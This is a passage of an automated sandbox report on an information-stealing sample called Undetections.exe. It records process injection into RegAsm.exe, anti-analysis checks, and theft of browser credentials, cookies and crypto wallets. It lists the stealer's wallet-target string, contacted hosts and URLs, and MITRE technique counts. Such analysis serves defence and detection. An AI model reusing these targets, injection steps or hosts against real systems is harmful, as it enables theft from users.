                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,4_2_004167B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410420 GetSystemInfo,wsprintfA,4_2_00410420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwared
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Undetections.exe, 00000000.00000002.4106624538.0000000005BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-72560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A55F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041A55F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418460 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410080 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,4_2_00410080
                          Source: C:\Users\user\Desktop\Undetections.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F638 SetUnhandledExceptionFilter,4_2_0041F638
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BA87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041BA87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_69D8AC62
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Code function: 2_2_031724AD CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_031724AD
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00411AB0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_00411AB0
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C7008
                          Source: C:\Users\user\Desktop\Undetections.exe Process created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe"
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69DD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,4_2_69DD4760
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69D8AE71 cpuid 4_2_69D8AE71
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,LocalFree,4_2_004102C9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\Undetections.exe Queries volume information: C:\Users\user\Desktop\Undetections.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Undetections.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Undetections.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Undetections.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe Queries volume information: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00410180 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00410100 GetProcessHeap,HeapAlloc,GetUserNameA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_004101E0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CD8390 NSS_GetVersion
                          Source: C:\Users\user\Desktop\Undetections.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match, File source: 2.2.spoofer.exe.4175570.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 2.2.spoofer.exe.4175570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: spoofer.exe PID: 7592, type: MEMORYSTR
                          Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fppC
                          Source: Undetections.exe, 00000000.00000002.4110420914.000000000745E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ethereum
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*ZN
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara match File source: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 2.2.spoofer.exe.4175570.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.spoofer.exe.4175570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: spoofer.exe PID: 7592, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69D90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,4_2_69D90B40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69D90D60 sqlite3_bind_parameter_name,4_2_69D90D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69D90C40 sqlite3_bind_zeroblob,4_2_69D90C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CB8EA0 sqlite3_clear_bindings,4_2_69CB8EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CB60B0 listen,WSAGetLastError,4_2_69CB60B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CBC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,4_2_69CBC050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CB6070 PR_Listen,4_2_69CB6070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CBC030 sqlite3_bind_parameter_count,4_2_69CBC030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CB63C0 PR_Bind,4_2_69CB63C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69C422D0 sqlite3_bind_blob,4_2_69C422D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69CB6410 bind,WSAGetLastError,4_2_69CB6410
                          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                          Execution: Windows Management Instrumentation (1); Native API (1); Command and Scripting Interpreter (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                          Privilege Escalation: DLL Side-Loading (1); Process Injection (511); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                          Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (41); Process Injection (511); Dynamic API Resolution
                          Credential Access: OS Credential Dumping (2); Input Capture (1); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                          Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (4); System Information Discovery (55); Query Registry (1); Security Software Discovery (241); Virtualization/Sandbox Evasion (41); Process Discovery (12); Application Window Discovery (1); System Owner/User Discovery (1)
                          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                          Collection: Archive Collected Data (1); Data from Local System (4); Screen Capture (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                          Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                          [Behavior graph. Behavior Graph ID: 1423660; Sample: Undetections.exe; Startdate: 10/04/2024; Architecture: WINDOWS; Score: 100. Process chain: Undetections.exe started spoofer.exe; spoofer.exe started RegAsm.exe and conhost.exe.]

                          Source | Detection | Scanner | Label | Link
                          Undetections.exe | 31% | Virustotal | | Browse
                          Undetections.exe | 26% | ReversingLabs | |
                          Undetections.exe | 100% | Joe Sandbox ML | |

                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe | 100% | Avira | TR/AD.Nekark.gilay |
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe | 100% | Joe Sandbox ML | |
                          C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                          C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                          C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                          No Antivirus matches
                          No Antivirus matches
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          universalbeure.usite.pro | 193.109.246.100 | true | false | | high
                          google.com | 172.253.115.113 | true | false | | high
                          steamcommunity.com | 104.102.129.112 | true | false | | high
                          ashjghas.ucoz.net | 193.109.246.100 | true | false | | high

                          Name | Malicious | Antivirus Detection | Reputation
                          https://95.217.212.139/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
                          https://universalbeure.usite.pro/STLprograms/NEW/hwid.txt | false | | high
                          https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txt | false | | high
                          https://95.217.212.139/softokn3.dll | false | Avira URL Cloud: safe | unknown
                          https://95.217.212.139/nss3.dll | false | Avira URL Cloud: safe | unknown
                          https://95.217.212.139/sqln.dll | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                          https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt | false | | high
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
